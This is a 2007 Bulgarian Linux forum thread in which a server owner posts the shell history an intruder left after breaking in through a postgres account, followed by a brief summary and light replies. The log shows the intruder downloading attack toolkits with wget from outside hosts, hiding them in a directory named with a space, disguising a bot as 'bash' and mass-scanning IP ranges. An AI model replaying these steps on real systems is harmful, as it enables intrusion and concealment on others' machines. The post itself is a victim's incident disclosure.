Linux за българи: Форуми

Хумор, сатира и забава => Живота, вселената и някакви други глупости => Темата е започната от: VladSun в May 28, 2007, 14:12



Титла: Логове на хакнат сървер
Публикувано от: VladSun в May 28, 2007, 14:12
Това е .bash_history лога от една от моите машини (онлайн вече 3-4 години). Пробивът беше през потребител на postgresql, който явно съм създал неправилно - даже нямам спомени за какво изобщо ми е трябвал postgresql...

Примерен код

w
w
/sbin/ifconfig | grep inet
passwd
w
cd /var/tmp
mkdir " "
cd " "
wget medina.su/java/mech.tgz
tar zxvf mech.tgz
rm -rf mech.tgz
mv flash/ .f
cd .f
chmod +x *
nano laur1
pico laur1
pico laur2
pico laur1
pico laur3
pico mech.set
mv ech "bash"
mv mech "bash"
chmod +x "bash"
/sbin/ifconfig | grep inet
export PATH="."
"bash"
"bash"
ps x
uname -a
cat /proc/cpuinfo
cd /dev/shm
w
mkdir " "
cd /var/tmp
mkdir " "
cd " "
ls
ls -al
cd .f
ls
ps x
cd ..
wget members.lycos.co.uk/hunedoara/mm.tgz
tar zxvf mm.tgz
rm -rf mm.tgz
cd conf
ls
cd ..
mv conf .f
cd .f
ls
cd conf
ls
ls
chmod +x *
./scan 213.133
cat vuln.txt
./scan 38.99
cat vuln.txt
./scan 69.124
cat vuln.txt
rm -rf vuln.txt
./scan 80.175
./scan 216.86
cat vuln.txt
rm -rf vuln.txt
ls
./scan 152.2; ./scan 70.245
cat vuln.txt
./scan 213.132
./scan 213.132
cat v
ls
rm -rf *.20000
./scan 196.34
cat vuln.txt
rmn -rf vuln.txt
rm -rf vuln.txt
./scan 141.57
cat v
./scan 220135
./scan 220.135
cat vuln.txt
cat vuln.txt
./scan 217.9
./scan 217.91
cat vuln.txt
rm\ -rf vuln.txt `
rm -rf vuln.txt
./scan 206.51
cat v
./scan 217.7
./scan 62.193
cat vuln.txt
rm -rf vuln.txt
./scan 155.239
cat v
./scan 193.254; ./scan 64.215
./scan 80.244; ./scan 142.232; ./scan 200.181; ./scan 82.241; ./scan 201.230; ./scan 151.204; ./scan 60.51
screen -r
scd /var/tmp
cd /var/tmp
cd " "
ls
cd .f
ld
l
sls
ls
cd ..
ls
cd ..
cd .f
cd /dev/shm
cd " "
ls
cd /var/tmp
cd " "
cd ..
ls -all
cd ." "
ls
cd " "
ls
ls -al
cd " "
cd .f
ls
cd conf/
ls
at v
cat v
screen
screen -r
screen -r
ps x
kill -9 28625
screen -r
screen -wipe 28625
cd /var/tmp
cd " "
cd .f
lks
ls
cd conf/
ls
rm -rf *.2000
rm -rf *.20000
screen
screen -R
screen -R
screen -r
cd /var/tmp
cd " "
cd .f
ls
cat v
cd  conf/
cat vuln.txt
screen -r
screen -r
screen -r
cat vuln.txt
cat vuln.txt
screen -r
screen -r
screen -r
cd /var/tmp
cd " "
cd .f
cd conf
cat vuln.txt
rm -rf vuln.txt
ls
./scan 66.240; ./scan 195.23; ./scan 65.93; ./scan 205.238
screen -r
cat v
screen -r
cat vuln.txt
screen -r
cat vuln.txt
cat vuln.txt
cat vuln.txt
screen r0r
screen -r
screen -r
cat v
ls
screen -r
screen -r


Действията на хакера (conf.team@gmail.com) с две думи са:
- инсталиране на сканиращ софтуер;
- инсталиране на IRC бот/червей;
- инсталиране на John the ripper.

Най-полезното за мен беше, разглеждайки файла с кракнатите пароли, че паролата "passat" е явно много разпространена и използването й не е много умно ;) За ползването на "password" за парола изобщо не ми се говори :) :) )

ПП: Сега видях, че въпросният хакер е попаднал на honeypot:
http://devloop.lyua.org/blog....re-2006





Титла: Логове на хакнат сървер
Публикувано от: eniac111 в May 28, 2007, 16:25
Подли хора... Не ти се е обадил :p

edit:
На мен пък последно ми хакнаха един Joomla сайт - http://gclass.info





Титла: Логове на хакнат сървер
Публикувано от: smelkomar в May 28, 2007, 17:20
Цитат
kill -9 28625


Т'ва порнография ли е? Какво точно е спрял?


Титла: Логове на хакнат сървер
Публикувано от: VladSun в May 28, 2007, 17:32
Еми предполагам някой от screen процесите.